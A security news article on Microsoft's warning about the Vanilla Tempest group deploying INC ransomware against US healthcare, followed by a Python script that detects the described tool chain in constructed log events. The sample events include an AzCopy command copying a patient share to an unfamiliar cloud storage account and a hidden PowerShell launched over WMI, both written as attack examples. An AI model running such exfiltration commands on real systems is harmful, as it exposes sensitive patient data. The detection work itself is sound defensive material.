Microsoft Warns of Dangerous and Debilitating INC Ransomware Targeting Healthcare Systems
Microsoft has issued a warning about a ransomware threat, INC, that is being deployed against the U.S. healthcare sector. The warning comes from Microsoft's threat intelligence team, which has been tracking a financially motivated group it calls Vanilla Tempest (formerly DEV-0832).
Vanilla Tempest and Its Tactics
Vanilla Tempest's intrusions follow a well-coordinated process. The group receives hand-offs from GootLoader infections run by the threat actor Storm-0494. After the GootLoader delivery, it uses a mix of custom and legitimate tools to establish control over target systems, including:
- Supper: A malicious backdoor
- AnyDesk: A legitimate remote monitoring and management (RMM) tool
- MEGA: A legitimate cloud storage and data-synchronization tool
Once inside, the attackers move laterally using Remote Desktop Protocol (RDP) and the Windows Management Instrumentation (WMI) Provider Host before deploying the INC ransomware payload.
A Growing Threat Across Multiple Sectors
Vanilla Tempest has been active since at least July 2022 and has previously targeted the education, IT, and manufacturing sectors. In earlier campaigns it has deployed ransomware families including BlackCat, Quantum Locker, Zeppelin, and Rhysida. Healthcare has since become a prime target, given its critical nature and the volume of sensitive data it handles.
Notably, Vanilla Tempest is also tracked under the alias Vice Society, a group that favors leveraging existing ransomware lockers instead of developing its own, a strategy that lets it move quickly without investing in malware development.
Evolving Techniques to Evade Detection
Ransomware groups continually evolve their tactics to avoid detection. In a related development, BianLian and Rhysida have been observed using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised systems. Because these are legitimate tools built for managing Azure storage, large-scale transfers to attacker-controlled cloud storage can blend in with normal administrative traffic, making them hard for security teams to detect and block.
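As an added example (not code from the original article or from Microsoft), the following Python script correlates the tooling chain described above, from the AnyDesk and MEGA stage through RDP and WMI lateral movement to the AzCopy exfiltration technique mentioned in this section, over a handful of constructed process-creation and logon records. The record layout, host names, file paths, the MEGA client binary names, and the allowlist of known storage accounts are assumptions for the example, not a product schema or real telemetry.

```python
import ntpath
import re
from collections import defaultdict

# Constructed sample events, shaped loosely like Sysmon process-creation
# (EID 1) and Security logon (EID 4624) records. Hosts, users, paths and
# IPs are invented; the field names are an assumption for this example.
SAMPLE_EVENTS = [
    {"ts": "2024-09-18T09:02:11Z", "host": "WS-07", "kind": "process",
     "image": r"C:\Users\jdoe\AppData\Local\Temp\AnyDesk.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent"},
    {"ts": "2024-09-18T09:05:40Z", "host": "WS-07", "kind": "process",
     "image": r"C:\Users\jdoe\AppData\Local\MEGAsync\MEGAsync.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "MEGAsync.exe"},
    {"ts": "2024-09-18T09:31:02Z", "host": "SRV-FILE-01", "kind": "logon",
     "logon_type": 10, "src_ip": "10.20.5.77", "user": "svc_backup"},
    {"ts": "2024-09-18T09:33:15Z", "host": "SRV-FILE-01", "kind": "process",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": 'cmd.exe /c "powershell -nop -w hidden -c whoami"'},
    {"ts": "2024-09-18T10:12:48Z", "host": "SRV-FILE-01", "kind": "process",
     "image": r"C:\Tools\azcopy.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "azcopy.exe copy D:\\Shares\\Patients "
                "https://stg4x9q.blob.core.windows.net/dump --recursive"},
    # Benign baseline: the organisation's own nightly backup job using AzCopy.
    {"ts": "2024-09-18T02:00:03Z", "host": "SRV-BKP-02", "kind": "process",
     "image": r"C:\Program Files\AzCopy\azcopy.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "azcopy.exe sync D:\\Backups "
                "https://corpbackup01.blob.core.windows.net/nightly"},
    # A lone RDP logon from an admin jump host: one stage, not enough alone.
    {"ts": "2024-09-18T11:40:00Z", "host": "SRV-APP-03", "kind": "logon",
     "logon_type": 10, "src_ip": "10.0.0.5", "user": "admin_ops"},
]

# Storage accounts the organisation legitimately writes to (assumed).
KNOWN_STORAGE_ACCOUNTS = {"corpbackup01"}
RMM_TOOLS = {"anydesk.exe"}
SYNC_TOOLS = {"megasync.exe", "megacmd.exe"}        # assumed MEGA client names
AZURE_COPY_TOOLS = {"azcopy.exe", "storageexplorer.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "wscript.exe"}
BLOB_RE = re.compile(r"https?://([a-z0-9]{3,24})\.blob\.core\.windows\.net", re.I)


def basename(path):
    return ntpath.basename(path).lower()


def classify(ev):
    """Map one event to a stage of the chain described above, or None."""
    if ev["kind"] == "logon":
        # Security 4624 logon type 10 is RemoteInteractive, i.e. RDP.
        return "rdp_logon" if ev.get("logon_type") == 10 else None
    image = basename(ev["image"])
    parent = basename(ev.get("parent", ""))
    if image in RMM_TOOLS:
        return "rmm_install"
    if image in SYNC_TOOLS:
        return "cloud_sync"
    if parent == "wmiprvse.exe" and image in SHELLS:
        # A shell spawned by the WMI Provider Host is the classic footprint of
        # remote command execution over WMI.
        return "wmi_exec"
    if image in AZURE_COPY_TOOLS:
        m = BLOB_RE.search(ev.get("cmdline", ""))
        account = m.group(1).lower() if m else None
        # Unknown or unparsable destination: treat as possible exfiltration.
        if account not in KNOWN_STORAGE_ACCOUNTS:
            return "azure_exfil"
    return None


def correlate(events, min_stages=2):
    """Group stage hits per host in time order; flag a host when it hits at
    least min_stages distinct stages or any unknown-destination Azure copy."""
    hits = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev)
        if stage:
            hits[ev["host"]].append(stage)
    report = {}
    for host, seq in hits.items():
        stages = []
        for s in seq:
            if s not in stages:
                stages.append(s)
        flagged = len(stages) >= min_stages or "azure_exfil" in stages
        report[host] = {"stages": stages, "flagged": flagged}
    return report


def flagged_hosts(events, min_stages=2):
    return sorted(h for h, r in correlate(events, min_stages).items() if r["flagged"])


if __name__ == "__main__":
    for host, r in correlate(SAMPLE_EVENTS).items():
        print(f"{host:12} flagged={str(r['flagged']):5} stages={' -> '.join(r['stages'])}")
```

Every tool in the chain except the Supper backdoor is legitimate software, so none of the individual stages is a signature on its own; the value is in the co-occurrence on one host within a short window, and the storage-account allowlist is what separates the backup job from an attacker's AzCopy run. The thresholds and lists are starting points to tune against an organization's own baseline.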
Protecting the Healthcare Sector
As ransomware groups continue to refine their techniques against vital sectors like healthcare, organizations must remain vigilant and proactive in their defenses. Microsoft's warning underlines the need for healthcare organizations to maintain robust security controls, including up-to-date anti-malware software and secure network practices. In practice that also means watching for legitimate remote-access and cloud-sync tools, such as AnyDesk and MEGA, appearing on systems where the organization does not itself use them.
By staying ahead of groups like Vanilla Tempest, the healthcare sector can better protect its data and avoid becoming the next victim of this extortion scheme.